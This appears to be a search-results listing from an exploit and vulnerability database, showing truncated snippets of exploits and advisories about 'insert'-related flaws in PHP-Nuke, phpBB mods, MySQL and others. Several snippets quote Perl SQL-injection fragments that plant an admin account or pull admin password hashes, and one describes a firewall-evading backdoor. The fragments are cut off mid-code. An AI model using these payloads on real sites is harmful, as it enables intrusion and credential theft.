1470 matches found
PHP-Nuke 8.0 Final - 'INSERT' SQL Injection
!/usr/bin/perl 0day exploit for PHP-nuke new; my $zadanie = HTTP::Request-newGET = $adres; my $respone,$referer; banner; $referer="http://www.krasza.int.pl';INSERT INTO nukeauthors VALUES 'krasza', 'God', 'http://www.krasza.int.pl', '[email protected]', '61af1f6e572d7fe3a72f54a6ac53830e', '0', '1'...
PHP-Nuke 8.0 Final - INSERT Blind SQL Injection (MySQL)
PHP-Nuke 8.0 Final - INSERT Blind SQL Injection MySQL !/usr/bin/perl 0day exploit for PHP-nuke = 4.0.24, using 'brute force' Coded by:Maciej krasza [email protected] Screenshot: 0day exploit for PHP-nuke new; my $zadanie = HTTP::Request-newGET = $adres; my...
PHP-Nuke 8.0 Final - HTTP Referers SQL Injection
!/usr/bin/perl 0day exploit for PHP-nuke new; my $zadanie = HTTP::Request-newGET = $adres; my $respone,$referer; banner; $referer="http://www.krasza.int.pl',NULL,SELECT pwd FROM nukeauthors WHERE radminsuper=1/"; $zadanie-referer$referer; $respone=$ua-request$zadanie; $respone-issuccess or die...
PHP-Nuke 8.0 Final - 'INSERT' Blind SQL Injection (MySQL)
!/usr/bin/perl 0day exploit for PHP-nuke = 4.0.24, using 'brute force' Coded by:Maciej krasza [email protected] Screenshot: 0day exploit for PHP-nuke new; my $zadanie = HTTP::Request-newGET = $adres; my...
PHP-Nuke <= 8.0 Final (INSERT) Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl 0day exploit for PHP-nuke =8.0 Final Sql injection attack in INSERT syntax version for every basePostgreSQL,mssql... except MySQL base Coded by:Maciej krasza [email protected] Screenshot: 0day exploit for PHP-nuke =8.0 Final Sql injection atta...
ezConvert: phpBB ezBoard converter v0.2 (ezconvert_dir) Remote File Include Exploit
No description provided by source. C xoron Name: ezConvert: phpBB ezBoard converter v0.2 ezconvertdir Remote File Include Exploit Author: xoron Exploit coded by xoron Download: http://sourceforge.net/project/showfiles.php?groupid=114129 xoron.biz - xoron.info www.xoron.info/bugs/ezconvert.txt...
Derdirigent.txt
ToXiC Der dirigent: Remote File Inclusion by ToXiC CreW ToXic Security Italian CreW BuG FounD by Drago84 Application Affect: Derdirigent Source Code: http://www.der-dirigent.de/downloads/derdirigentv1.0.zip Page: insertline.php insertpage.php find.php fullscreen.php changecase.php insertlink.php...
Phpbb-insert.txt
$ BiyoSecurity.Org & SecurityWall.Org $ Script Name : Phpbb insert module $ versions : 0.1.0 and 0.1.1 $ Risk : High $ Regard : KorsaN $ Thanks : Liz0zim , RMx , TRIP , DreamLord , Kubra $ Vulnerable File : functionsmoduser.php $ Vulnerable code : includeonce$phpbbrootpath...
phpBB Insert User Mod 0.1.2 - Remote File Inclusion
phpBB Insert User Mod 0.1.2 - Remote File Inclusion !/usr/bin/perl PHPBB insert user 0.1.2 Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://www.grahameames.co.uk/phpbb/downloads/insertuser0.1.2.zip use IO::Socket; use LWP::Simple;...
CVE-2006-4584
Tr Forum 2.0 is affected by CVE-2006-4584, where remote attackers can bypass authentication and add an administrative account via login and password parameters to admin/insert_admin.php. The vulnerability allows partial confidentiality, integrity, and availability impact (CVSS v2 base score 7.5, ...
Directory traversal
Directory traversal vulnerability in scanlanginsert.php in Boris Herbiniere-Seve SPiD 1.3.1 allows remote attackers to read arbitrary files via the lang parameter...
The Shuttle to the firewall under the Black Horse--DBB-vulnerability warning-the black bar safety net
Today want to introduce DarkStorm BePassFireWall Virus V1. 2 is a high success rate is extremely high rebound port through the firewall of the back door program, hereinafter referred to as DBB, and can penetrate 9 9% of the firewall. The back door using a thread insert technology, the concealment...
arabPortalSQL.txt
Hi .. This is small bug for Arab Portal System v2 Beta 2 File name :- global.php Remote:- Yes Credit :- Devil-00 Messenger :- E-Mail :- //-- Devil SQL Injection / This SQL can do when :- magicquotesgpc = Off $sessionid query"DELETE FROM rafiaonline WHERE onlineSID ='$sessionid' or timestamp...
PT-2005-4742 · Sapid · Sapid Cms
Name of the Vulnerable Software and Affected Versions: SAPID CMS versions prior to 1.2.3.03 Description: The issue allows remote attackers to bypass authentication by making direct requests to certain files, including insert file.php, insert image.php, insert link.php, insert qcfile.php, and...
MDKSA-2005:220 - Updated kernel packages fix numerous vulnerabilities
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDKSA-2005:220 http://www.mandriva.com/security/ Package : kernel Date : November 30, 2005 Affected: 10.2 Problem Description: Multiple vulnerabilities in the Linux 2.6 kernel have been discovered and corrected in this...
FishCart SQL injections
FishCart contains multiple SQL injection vulnerabilities in the program that can be exploited to modify/delete/insert entries into the database. In addition, the program suffers from cross site scripting vulnerabilities. SPDX-FileCopyrightText: 2005 Noam Rathaus Some text descriptions might be...
security flaw
Array index overflow in the xfrmskpolicyinsert function in xfrmuser.c in Linux kernel 2.6 allows local users to cause a denial of service oops or deadlock and possibly execute arbitrary code via a p-dir value that is larger than XFRMPOLICYOUT, which is used as an index in the sock-skpolicy array...
CVE-2005-2572
MySQL, when running on Windows, allows remote authenticated users with insert privileges on the mysql.func table to cause a denial of service server hang and possibly execute arbitrary code via 1 a request for a non-library file, which causes the Windows LoadLibraryEx function to block, or 2 a...
FreeBSD : mysql-server -- multiple remote vulnerabilities (619ef337-949a-11d9-b813-00d05964249f)
SecurityFocus reports : MySQL is reported prone to an insecure temporary file creation vulnerability. Reports indicate that an attacker that has 'CREATE TEMPORARY TABLE' privileges on an affected installation may leverage this vulnerability to corrupt files with the privileges of the MySQL proces...
IBM DB2 universal database protection bypass
User with only SELECT permissions can can insert, update or delete records...